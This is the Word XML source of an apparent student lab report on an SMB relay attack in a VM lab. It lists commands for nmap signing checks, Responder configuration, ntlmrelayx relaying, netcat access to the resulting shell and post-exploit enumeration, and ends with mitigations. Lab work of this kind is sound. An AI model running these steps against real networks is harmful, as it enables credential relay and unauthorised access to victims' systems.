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18A84">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Lab 4: SMB Relay Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18550E89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Name - Ishan Chowdhury</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2650CD1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Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327F714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Set up Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37533E47">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Start Kali Linux attacker VM and Windows victim VM in the same network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC779F1">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirm IPs using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Windows) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Kali).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0038910C">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Ensure SMB signing is disabled on target (check using nmap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750C0E7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Scan for SMB Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCD8887">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140B0FF8">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap --script=smb2-security-mode -p445 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>192.168.132.141</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7941DA70">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="14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Confirm output shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>message signing enabled but not required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4BF5F36B">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Prepare Target List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267863FA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Create a text file with vulnerable IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0F1CA1">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>echo "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>192.168.132.141</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>" &gt; targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED27BF">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Configure Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16921312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 xml:space="preserve">Edit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>/etc/responder/Responder.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A549C5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 xml:space="preserve">Set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>SMB = Off</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>HTTP = Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C23B0D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Save and start Responder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B10640C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Style w:val="6"/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sudo responder -I eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F417681">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Set Up SMB Relay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845D1F0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Run ntlmrelayx against the target list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A5B18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Style w:val="6"/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ntlmrelayx.py -tf targets.txt -I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A4DC30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Wait for victim authentication attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011A7DAA">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Trigger the Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694506CD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 xml:space="preserve">From victim machine, access attacker IP in File Explorer (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>\\10.0.2.5\share</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050211C6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Observe authentication captured and relay initiated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8BE61C">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Gain Interactive SMB Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0257CA86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When shell spawns, connect via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5AAD89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Style w:val="6"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc 127.0.0.1 11000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB0DDD7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 xml:space="preserve">Verify access with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34119AD3">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>Post-Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FEE6D3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Enumerate shares, users, and sensitive files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B6DC2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Document all commands and captured sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6460295B">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79367EAD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Enable SMB signing on all devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C0AB8C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t>Disable NTLM authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AABB4C7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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>Enforce account tiering and limit local admin rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35687EDA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Style w:val="6"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6C9F92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ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DDAB525">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun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45384"/>
    <w:rsid w:val="06D4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2025-10-30T12:44:00Z</dcterms:created>
  <dc:creator>Ishan Chowdhury</dc:creator>
  <cp:lastModifiedBy>Ishan Chowdhury</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-30T12:50:00Z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81A7068C260748F68B6E2287BE0EE11B_11</vt:lpwstr>
  </property>
</Properties>
</file>